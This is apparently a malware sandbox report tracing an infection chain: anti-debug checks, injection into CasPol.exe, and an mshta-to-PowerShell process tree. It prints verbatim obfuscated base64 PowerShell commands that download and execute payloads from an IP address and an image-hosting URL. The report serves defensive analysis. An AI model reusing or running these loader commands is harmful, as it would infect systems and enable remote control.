                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000003.00000002.2228337741.0000000002A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHI
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000007.00000003.2212973785.00000000058E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000007.00000003.2212973785.00000000058E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8Y
                      Source: powershell.exe, 00000003.00000002.2235184005.000000000802F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000003.00000002.2235184005.000000000802F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000008.00000002.2524648452.0000000008060000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-47351
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]12_2_00442554
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044E92E GetProcessHeap,12_2_0044E92E
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B44
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433CD7 SetUnhandledExceptionFilter,12_2_00433CD7

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: amsi32_5924.amsi.csv, type: OTHER
                      Source: Yara matchFile source: amsi32_5924.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 11C3008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418754 mouse_event,12_2_00418754
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prasonJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfhvvuxxnfnwuvbuicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklvrzueugicagicagicagicagicagicagicagicagicagicagicaglu1ltujfumrlrklusvrjt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrhf0t0f2shosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihdzrkvwdvpjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagryx1aw50icagicagicagicagicagicagicagicagicagicagicagiehneu1abvpwleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbocwzkb1lkbeduktsnicagicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicagicj6tujpbsigicagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfjrsagicagicagicagicagicagicagicagicagicagicagicbsehlebcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicryvvvmctrtvlfqvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzc0ljiwoc44mc4yndgvndmvc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwviywnrlnrjriisiirltly6qvbqrefuqvxzzwv3agf0awftzg9pbmdmb3j5b3v3axroz3jlyxruzxnzdghpbmdzz2l2zw5tzwiudmjtiiwwldapo3nuyxjulvnmruvwkdmpo0ludk9lzs1lefbyzvnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwvilnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfhvvuxxnfnwuvbuicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklvrzueugicagicagicagicagicagicagicagicagicagicagicaglu1ltujfumrlrklusvrjt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrhf0t0f2shosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihdzrkvwdvpjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagryx1aw50icagicagicagicagicagicagicagicagicagicagicagiehneu1abvpwleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbocwzkb1lkbeduktsnicagicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicagicj6tujpbsigicagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfjrsagicagicagicagicagicagicagicagicagicagicagicbsehlebcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicryvvvmctrtvlfqvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzc0ljiwoc44mc4yndgvndmvc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwviywnrlnrjriisiirltly6qvbqrefuqvxzzwv3agf0awftzg9pbmdmb3j5b3v3axroz3jlyxruzxnzdghpbmdzz2l2zw5tzwiudmjtiiwwldapo3nuyxjulvnmruvwkdmpo0ludk9lzs1lefbyzvnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwvilnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $combo = 'jgnhbxblc3qgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskcmvkb3vidgvkid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddskchljbmlkid0gjhjlzg91ynrlzc5eb3dubg9hzerhdgeojgnhbxblc3qpoyrvcmfjdwxvdxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkchljbmlkktskbgfsbgf0aw9uid0gjzw8qkftrty0x1nuqvjupj4noyrkzxn0zw1zid0gjzw8qkftrty0x0vord4+jzskc2nhchvszxqgpsakb3jhy3vsb3vzlkluzgv4t2yojgxhbgxhdglvbik7jgh5zhjvzwxly3ryawmgpsakb3jhy3vsb3vzlkluzgv4t2yojgrlc3rlbxmpoyrzy2fwdwxldcatz2ugmcatyw5kicroewryb2vszwn0cmljic1ndcakc2nhchvszxq7jhnjyxb1bgv0ics9icrsywxsyxrpb24utgvuz3rooyrwywlsbwfpbca9icroewryb2vszwn0cmljic0gjhnjyxb1bgv0oyroywdyawrlcya9icrvcmfjdwxvdxmuu3vic3ryaw5nkcrzy2fwdwxldcwgjhbhawxtywlsktskc3vwzxjsaw5lyxigpsatam9pbiaojghhz3jpzgvzllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcroywdyawrlcy5mzw5ndggpxtskdhvya2lzag5lc3mgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkcrzdxblcmxpbmvhcik7jgftcghpz2vuawegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcr0dxjraxnobmvzcyk7jhrlbglmzxjhid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhrlbglmzxjhlkludm9rzsgkbnvsbcwgqcgnmc9us050my9yl2vllmv0c2fwly86c3b0dggnlcanjhjldmfuy2hpc3rzjywgjyryzxzhbmnoaxn0cycsicckcmv2yw5jaglzdhmnlcanq2fzug9sjywgjyryzxzhbmnoaxn0cycsicckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlcckcmv2yw5jaglzdhmnlccxjywnjhjldmfuy2hpc3rzjywnjykpow==';$prason = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($combo));invoke-expression $prason
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfhvvuxxnfnwuvbuicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklvrzueugicagicagicagicagicagicagicagicagicagicagicaglu1ltujfumrlrklusvrjt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrhf0t0f2shosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihdzrkvwdvpjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagryx1aw50icagicagicagicagicagicagicagicagicagicagicagiehneu1abvpwleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbocwzkb1lkbeduktsnicagicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicagicj6tujpbsigicagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfjrsagicagicagicagicagicagicagicagicagicagicagicbsehlebcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicryvvvmctrtvlfqvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzc0ljiwoc44mc4yndgvndmvc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwviywnrlnrjriisiirltly6qvbqrefuqvxzzwv3agf0awftzg9pbmdmb3j5b3v3axroz3jlyxruzxnzdghpbmdzz2l2zw5tzwiudmjtiiwwldapo3nuyxjulvnmruvwkdmpo0ludk9lzs1lefbyzvnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwvilnziuyi='+[char]0x22+'))')))"Jump to behavior
